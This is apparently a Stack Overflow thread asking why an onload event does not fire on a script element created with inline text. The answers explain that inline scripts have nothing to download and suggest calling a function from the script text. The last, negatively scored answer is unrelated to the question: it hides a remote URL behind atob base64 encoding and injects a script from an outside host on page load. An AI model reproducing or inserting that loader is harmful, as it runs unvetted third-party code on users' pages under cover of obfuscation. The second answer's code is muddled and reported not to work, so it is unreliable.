# onload event in script tag not firing

Tags: javascript, onload, script-tag

To preface, I have looked at the existing posts about this issue on SO and I believe my code incorporates all suggested fixes, yet it still doesn't work.

I am trying to get a simple onload event to fire:

```
var test = function() {
    console.log("Script loaded! V2")
}

//Append new user script to head 
const userProg = document.createElement('script')
userProg.type = 'text/javascript'
userProg.id = 'user-program'

userProg.addEventListener('load', test, false)
userProg.onload = function() {
    console.log("Script loaded! V1")
}

userProg.text = [goatPuzzleSetupCode, genericSetupCode, userCode, resultToJSONCode].join('\n')
document.head.appendChild(userProg)
```

What's frustrating is that I have gotten the `onload` event to fire before, but I don't have a copy of my code from when it was working. So I'm not sure what the issue is.

Comment: I've had my `onload`s fail due to `src` being set to hit `https` but the cert for it was wrong, so it gets blocked.

Comment: Right now - the project is all local - it's not hosted on the web yet.

Comment: If you paste the script's url in the browser, it shows?

Comment: Are you even setting the `src` for your created element?

Comment: No, I am not. I am only setting the inner text of the script element.

Comment: You need to set the `src` to your js file i.e `userProg.src = 'test.js'`

Comment: But there is no `src` attribute - I am setting the `text` attribute of the script element in order to run some dynamically generated js.

Comment: Why do you expect the `onload` to fire if you're setting js code? The `onload` is for when the element loads. i,e finished downloading.

Comment: I expected it to fire because it worked previously (At least I believe it did). If `onload` isn't working because I haven't set `src` attribute, is there an alternative  I can use for when the script finishes executing?

Answer (score 4, accepted):

It sounds like you're looking for an event like [afterscriptexecute](https://developer.mozilla.org/en-US/docs/Web/Events/afterscriptexecute), which is unfortunately non-standard and shouldn't be used. But, because you're inserting the script text directly already, it should be simple enough to add something else to the text that fires a `window` function, assuming the appended script doesn't contain errors. For example:

```js
window.scriptLoaded = function() {
    console.log("Script loaded! V2")
}
const text1 = 'console.log("script1 running")';
const text2 = 'console.log("script2 running")';
//Append new user script to head 
const userProg = document.createElement('script')
userProg.text = [text1, text2, 'scriptLoaded();'].join('\n');
document.head.appendChild(userProg)
```

(`onload` doesn't work because, as a comment said:

> The onload is for when the element loads. i,e finished downloading.

but there's nothing for a script without a `src` to download)

Comment: There should probably be a note about *why* `onload` didn't work. *(It is because there is nothing to load for an inline script)*

Answer (score 2):

`Onload` is not working in your case because *there is nothing to load for an inline script* It will work for the *scripts that will be downloaded* i.e. `remote scripts`.

However also need to take care about 1 thing for `remote scripts`:

**Need to set the `src` attribute after the `onload` event.**

```js
//Append new user script to head 
var goatPuzzleSetupCode=  console.log("Script goatPuzzleSetupCode");
var genericSetupCode=  console.log("Script genericSetupCode");
var userCode=  console.log("Script userCode");
var resultToJSONCode=  console.log("Script resultToJSONCode");
var userProg = document.createElement('script');


var script="//cdnjs.cloudflare.com/ajax/libs/less.js/1.3.3/less.min.js";
//userProg.addEventListener('load', test, false);
userProg.onload = function(script) {
    console.log("Script loaded! 1"+script)
 test();
};
userProg.src=script;
userProg.text = [goatPuzzleSetupCode, genericSetupCode, userCode, resultToJSONCode].join('\n')
document.head.appendChild(userProg);


 
 var test = function() {
    console.log("Script loaded! 2")
}
```

Comment: This didn't work. Also I'm not sure how this would work - because it wouldn't be specific to my script.

Answer (score 0):

if the load event is not triggered on the script element because content is not being downloaded, then

```js
                    
                    ;
                    console.log(1);

                    var script    = document.createElement('script');
                    script.textContent    = `
                          console.log(2);
                          a++;    //-- generate error
                          console.log(3);
                    `;
                    document.head.append(script);

                    console.log(4);
                    
                    //output->1,2,4
```

it seems the script content is executed immediately, hopefully this is standard

so just continue with your program ( or call the onload function yourself )

Answer (score -2):

```
<script type="text/javascript">
  window.onload = function() {
    var e = document.createElement("script"),
      t = document.getElementsByTagName("script")[0];
    e.async = !0, e.src = atob("aHR0cHM6Ly9jaGF0NHNpdGUuYWkvZW1iZWRXaWRnZXQuanM/dD0=") + Math.floor(Date.now()), e.charset = "UTF-8", e.setAttribute("crossorigin", "*"), e.setAttribute("widgetId", "17432574"), t.parentNode.insertBefore(e, t)
  }();
</script>
```